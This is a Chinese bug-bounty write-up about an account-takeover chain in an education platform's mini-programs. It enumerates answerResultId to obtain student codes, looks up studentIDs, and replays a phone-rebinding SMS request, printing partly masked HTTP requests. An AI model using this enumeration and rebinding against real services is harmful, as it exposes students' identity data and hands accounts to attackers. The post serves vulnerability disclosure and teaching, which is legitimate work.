文章总结： 该文章描述了一个SRC实战案例，发现了一个严重的安全漏洞，允许攻击者完全接管任意用户账号。漏洞存在于某教育平台的小程序中，攻击者可通过修改answerResultId参数遍历获取学号，进而查询获取studentID，最终在另一个小程序中修改手机号绑定，成功接管账号。该漏洞导致大量学生敏感信息泄露，包括手机号、真实姓名、地址、身份证等，并允许攻击者批量换绑学员账号，登录多个系统包括核心资产。文章提供了详细的漏洞复现过程和验证方法，展示了该漏洞的严重危害。 综合评分： 85 文章分类： SRC活动,漏洞分析,WEB安全,数据泄露,应用安全

【SRC实战】只给了800的严重漏洞（加码）

原创

江

隐雾安全

2025年11月6日 10:00 四川

01

前言

1、完全接管任意用户的账号，且账号是可以被遍历的。

2、敏感信息泄漏：手机号、真实姓名、地址、3、身份证等大量敏感信息未脱敏显示。

敏感操作，由于此站点存在不同权限的用户，高权限账号允许完成大量的敏感操作。

漏洞危害

免责声明

本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。

02

任意账户接管

想要复现该漏洞需要找到stundentcode和studentID 两个值，均能通过以下操作遍历

登录***小程序

随便点击一份报告，产生如下数据包

此时修改 answerResultId 可以查看提交答案的人的学号，以下是近期还在提交作业学员的 stundentcode

数据包如下：

GET /xeasy-srv-item/collection/report/detail?answerResultId=5050673 HTTP/2 Host: ******.cnCookie: gr_user_id=400634c3-b71d-4c60-a500-85a146e81ba9; cityMarketingSource=beijing; XDFUUID=bcf09db7-1f30-dabb-343a-41e675a15de4; x-e-dr=b778dd93-1b4a-4b7a-a6fc-721d8aa66814;Hm_lvt_e010d1faf316a4dbfe8639481a2a3f90=174 8246562; t-33lb5eopdqw=v-33lb5er8uim; cityCode=110100; Hm_lpvt_e010d1faf316a4dbfe8639481a2a3f90=1748247136; U2AT=348126c0-c05b-43c6-9f59-bf72cff75370; 863788c8cb539c69_gr_session_id=1411a18a-cf0e-4918-ae6f-815b3cc60ed4; b972947ae652f36a_gr_session_id=9bd51107-69a6-4fb7-b208-741217d58d6c; b972947ae652f36a_gr_session_id_9bd51107-69a6-4fb7-b208-741217d58d6c=true Accept: application/json, text/plain, */* U2at: 348126c0-c05b-43c6-9f59-bf72cff75370 Source: H5_C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c33)XWEB/13639 Origin: https://**.***.cn Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://******.cn/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=1, i

遍历后四位出现如下信息

Stundentcode 值被成功遍历

点击此处

输入学员号查询

出现如下数据包

发送至重放器观察，响应包就出现了studentID值

由此可通过学员号对stundentID值进行查询接下来换到另一个小程序打开**小学堂，点击我的，点击切换

点击修改手机号

正确验证本机号码

绑定新手机号正确输入验证码即可，开启拦截抓住完成的数据包

此时抓包，数据包如下

GET /api/standard/sms/validCaptcha?status=1&captcha=977785&mobile=173+****+****&studentC ode=BLDF695439****&studentId=e332fb0223b94e99951daa5********* HTTP/2 Host: ******.cn Cookie: gr_user_id=5eadb946-a3b4-4956-a615-835226ebcef6;U2AT=6ee24884-4c09-4df4-93dc-e7ecb814878 8 Accept: application/json, text/plain, */* Identitytype: null Logintype: 1 Appid: readingproUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c33)XWEB/13639 Channeltype: null Origin: https://******.cn Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://******.cn/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=1, i

放过数据包成功绑定登录该账号查看

该账号可登录多个平台包括核心资产，****教室

此时可查看到该学生姓名身份证电话出生日期家庭住址学生家长电话老师姓名电话（注意有些学生只有部分信息）等敏感信息，以及使用所有功能但是由于该学生号没有绑定相关信息只能查看部分可以绑定stundentCode:BJ2****51studentId:c4a8ab355c35408d8ed******b3a5f62来验证

***国际教育混合中心

漏洞危害：泄露大量学生信息，批量换绑学员账号，登录多个系统，包括核心资产

网安交流群

微信号｜Hiddenfog001